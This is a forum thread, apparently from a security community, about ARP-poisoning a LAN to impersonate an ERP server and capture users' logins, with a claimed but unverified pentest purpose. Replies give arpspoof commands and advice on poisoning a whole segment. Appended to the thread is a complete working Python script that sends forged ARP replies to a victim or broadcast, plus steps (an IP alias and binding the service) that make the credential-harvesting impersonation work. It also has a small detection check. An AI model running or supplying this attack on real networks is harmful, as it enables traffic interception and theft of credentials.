
Thread: Arp poisoning / Redirecting to my own machine?

  1. #1
    Just burned his ISO
    Join Date
    May 2008
    Posts
    24

    Arp poisoning / Redirecting to my own machine?

    Hi

    I need to ARP poison / redirect clients somehow so that the traffic on the LAN goes to my own machine (not forwarding it just to sniff). Let me explain: I'm inside a network and I want to set up a fake custom service (it's part of an ERP) to steal authentication.

    What's the problem?

    They do not use DNS queries to reach this server (they use the IP directly).
    They do not use DHCP on this LAN.

    Is there a way I can impersonate the server to the local users (some kind of ARP poisoning, etc.) so that all requests that should go to server 10.0.0.2 (MAC 01:02:03:04:05:06) go to my machine 10.0.0.26 (MAC 66:66:66:66:66:66)? Yes, I do not want to forward the traffic; I want to bind a port and respond to this service myself.

    Any ideas about how to do it on Windows or Linux?

    Thanks, mates.

  2. #2
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281


    Quote Originally Posted by The Dan
    I'm inside a network and I want to set up a fake custom service (it's part of an ERP) to steal authentication.
    Are you authorized to do so? Just wondering, because stealing usernames and passwords sounds strange in the first place.
    Tiocfaidh ár lá

  3. #3
    Just burned his ISO
    Join Date
    May 2008
    Posts
    24


    Hi KMDave

    How are you?

    Sure, I work for a security company and one of my jobs is internal penetration tests, as I had already explained here in another post; I believed that was clear.

    Some evidence is here:

    http://forums.remote-exploit.org/sho...t=16469&page=3

    http://forums.remote-exploit.org/showthread.php?t=17010

    Sorry if it was not clear from the first post.

    Back to the thread: does anyone have a suggestion for me?

    Thank you

  4. #4


    If you are on the same network segment as the victim, try using arpspoof.

    Good Luck...

  5. #5
    Just burned his ISO
    Join Date
    May 2008
    Posts
    24


    Hi cybrsnpr

    Thank you for reply.

    I did think of using the dsniff package (arpspoof) but I had no success. In theory I should only set up a one-way ARP spoof and disable ip_forward, no?

    Like this:

    arpspoof -t VictimIP IPofMachineIWantToBe
    echo 0 > /proc/sys/net/ipv4/ip_forward
    However, in my tests it does not work: it poisons (the ARP entry on VictimIP is forged), but if I set up a service on my attacker machine and try to connect from VictimIP I get connection refused.

    Off topic: is there a way to use arpspoof to poison an entire segment (like a class C network) instead of a single machine? I looked at the man page and it does not say anything.

    Thank you in advance.

  6. #6
    Junior Member
    Join Date
    Jul 2007
    Posts
    71


    Quote Originally Posted by The Dan
    Off topic: is there a way to use arpspoof to poison an entire segment (like a class C network) instead of a single machine? I looked at the man page and it does not say anything.
    Of course. Just don't supply a target to arpspoof.

    Edit: Forgot to mention: a segment-wide arpspoof WILL set off an IDS if there is one on the network. Not sure of your contract terms, but can you afford to be caught / blatantly obvious, or do you need to remain stealthy? An arpspoof that big is a dead giveaway.
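
What arpspoof actually puts on the wire in posts #5 and #6 is an unsolicited ARP reply, "10.0.0.2 is-at 66:66:66:66:66:66", resent every couple of seconds, addressed either to one victim (-t) or, with no target, to the Ethernet broadcast address. The script below is an added example written for this thread; it is not code from the thread, from dsniff, or from any of the posters. It builds and decodes such frames with nothing but the standard library, sends them on Linux (raw AF_PACKET sockets, so root is required), and includes the matching check an arpwatch-style monitor makes: a reply that claims the server's IP for a MAC other than the real one. The server/attacker addresses are the thread's (10.0.0.2 / 01:02:03:04:05:06 and 10.0.0.26 / 66:66:66:66:66:66); the victim 10.0.0.50 / 0a:0b:0c:0d:0e:0f and the interface name are assumptions made up for the example.

```python
"""Unsolicited ARP replies claiming a server's IP for the attacker's MAC.

Added example for this thread, not code from the thread or from dsniff.
Reproduces what `arpspoof [-t VictimIP] ServerIP` sends; the victim
10.0.0.50 / 0a:0b:0c:0d:0e:0f used below is an assumed, constructed host.
Building and parsing frames is portable; sending needs Linux and root.
"""
import socket
import struct
import sys
import time

ETH_P_ARP = 0x0806
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"
ARP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    """'66:66:66:66:66:66' -> six raw bytes; ValueError on malformed input."""
    parts = mac.split(":")
    if len(parts) != 6:
        raise ValueError(f"bad MAC address: {mac!r}")
    return bytes(int(p, 16) for p in parts)


def fmt_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(spoofed_ip: str, attacker_mac: str,
                    target_ip: str = "0.0.0.0",
                    target_mac: str = BROADCAST_MAC) -> bytes:
    """Ethernet frame carrying the reply '<spoofed_ip> is-at <attacker_mac>'.

    With the default target this is the broadcast variant (arpspoof with
    no -t): every host on the segment that already caches <spoofed_ip>
    rewrites that entry to the attacker's MAC.
    """
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(attacker_mac), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s",
                      1,                 # htype: Ethernet
                      0x0800,            # ptype: IPv4
                      6, 4,              # hlen, plen
                      ARP_REPLY,
                      mac_bytes(attacker_mac), socket.inet_aton(spoofed_ip),  # sender: the lie
                      mac_bytes(target_mac), socket.inet_aton(target_ip))     # target: the victim
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode an Ethernet+ARP frame (ours or a captured one) into its fields."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet+ARP")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        raise ValueError(f"not ARP (ethertype 0x{ethertype:04x})")
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {
        "eth_dst": fmt_mac(dst), "eth_src": fmt_mac(src), "op": op,
        "sender_mac": fmt_mac(sha), "sender_ip": socket.inet_ntoa(spa),
        "target_mac": fmt_mac(tha), "target_ip": socket.inet_ntoa(tpa),
    }


def is_poison_for(frame: bytes, server_ip: str, server_mac: str) -> bool:
    """Detection side: an ARP reply claiming server_ip for any MAC but the
    real one. This IP/MAC mismatch is what arpwatch-style monitors alert on."""
    try:
        a = parse_arp(frame)
    except ValueError:
        return False
    return a["op"] == ARP_REPLY and a["sender_ip"] == server_ip \
        and a["sender_mac"] != server_mac.lower()


def poison(iface: str, frame: bytes, interval: float = 2.0) -> None:
    """Resend forever: the real server keeps answering the victim's ARP
    requests, so a single forged reply is overwritten within seconds."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP)) as s:
        s.bind((iface, 0))
        while True:
            s.send(frame)
            time.sleep(interval)


if __name__ == "__main__":
    # e.g.  sudo python3 poison.py eth0 10.0.0.2 66:66:66:66:66:66 10.0.0.50 0a:0b:0c:0d:0e:0f
    # omit the last two arguments for the broadcast (whole-segment) variant
    if len(sys.argv) not in (4, 6):
        sys.exit("usage: IFACE SERVER_IP ATTACKER_MAC [VICTIM_IP VICTIM_MAC]")
    iface, server_ip, attacker_mac = sys.argv[1:4]
    victim = sys.argv[4:6] or ["0.0.0.0", BROADCAST_MAC]
    poison(iface, build_arp_reply(server_ip, attacker_mac, *victim))
```

Poisoning alone only delivers frames for 10.0.0.2 to the attacker's NIC; the attacker's kernel then sees an IP that is neither local nor (with ip_forward=0) forwardable and drops it. To answer as the server from 10.0.0.26, give the kernel that address too, e.g. `ip addr add 10.0.0.2/32 dev eth0`, and bind the fake service to 0.0.0.0 or to 10.0.0.2; the alias also makes the attacker's stack answer ARP requests for 10.0.0.2, which matters because Linux clients only update cache entries they already have from unsolicited replies (new ones need arp_accept=1) and re-verify them with a unicast ARP probe to the new MAC. Every repeated reply carrying the wrong MAC for 10.0.0.2 is exactly what `is_poison_for` flags, which is the IDS concern raised above, and the broadcast variant multiplies that noise by every host on the segment.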
